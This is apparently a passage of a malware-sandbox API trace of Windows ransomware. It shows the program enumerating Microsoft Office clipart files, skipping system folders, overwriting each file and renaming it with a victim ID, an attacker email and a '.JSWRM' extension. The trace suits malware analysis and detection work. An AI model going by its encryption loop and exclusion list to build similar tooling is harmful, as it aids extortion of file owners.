cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0073.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0073.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0073.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0073.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0073.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.792] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0073.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.792] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf7e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00174_.GIF", cAlternateFileName="")) returned 1 [0073.792] lstrcmpiW (lpString1="AG00174_.GIF", lpString2=".") returned 1 [0073.793] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="..") returned 1 [0073.793] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="...") returned 1 [0073.793] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="windows") returned -1 [0073.793] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="recovery") returned -1 [0073.793] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="perflogs") returned -1 [0073.793] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="documents and settings") returned -1 [0073.793] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.793] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="system volume information") returned -1 [0073.793] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="msocache") returned -1 [0073.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00174_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00174_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00174_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0073.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00174_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00174_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00174_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0073.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.794] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3966) returned 1 [0073.794] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf70) returned 0x24c1d0 [0073.794] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xf70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xf70, lpOverlapped=0x0) returned 1 [0073.796] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.796] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xf70, lpOverlapped=0x0) returned 1 [0073.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.796] CloseHandle (hObject=0x460) returned 1 [0073.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0073.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0073.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0073.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0073.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0073.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.796] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0073.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.797] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd32, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00175_.GIF", cAlternateFileName="")) returned 1 [0073.797] lstrcmpiW (lpString1="AG00175_.GIF", lpString2=".") returned 1 [0073.797] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="..") returned 1 [0073.797] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="...") returned 1 [0073.797] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="windows") returned -1 [0073.797] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="recovery") returned -1 [0073.797] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="perflogs") returned -1 [0073.797] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="documents and settings") returned -1 [0073.797] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.797] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="system volume information") returned -1 [0073.797] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="msocache") returned -1 [0073.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00175_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00175_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00175_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0073.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00175_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00175_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00175_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0073.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.798] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3378) returned 1 [0073.799] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd30) returned 0x24c1d0 [0073.799] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xd30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xd30, lpOverlapped=0x0) returned 1 [0073.800] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.800] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xd30, lpOverlapped=0x0) returned 1 [0073.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.800] CloseHandle (hObject=0x460) returned 1 [0073.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0073.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0073.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0073.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0073.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0073.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.801] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0073.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.805] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc30, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00176_.GIF", cAlternateFileName="")) returned 1 [0073.806] lstrcmpiW (lpString1="AG00176_.GIF", lpString2=".") returned 1 [0073.806] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="..") returned 1 [0073.806] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="...") returned 1 [0073.806] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="windows") returned -1 [0073.806] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="recovery") returned -1 [0073.806] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="perflogs") returned -1 [0073.806] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="documents and settings") returned -1 [0073.806] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.806] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="system volume information") returned -1 [0073.806] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="msocache") returned -1 [0073.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0073.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00176_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00176_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00176_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0073.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0073.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00176_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00176_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00176_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0073.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.808] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3120) returned 1 [0073.808] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc30) returned 0x24c1d0 [0073.808] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xc30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xc30, lpOverlapped=0x0) returned 1 [0073.809] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.809] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xc30, lpOverlapped=0x0) returned 1 [0073.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.810] CloseHandle (hObject=0x460) returned 1 [0073.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0073.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0073.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0073.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0073.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0073.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.810] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0073.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: 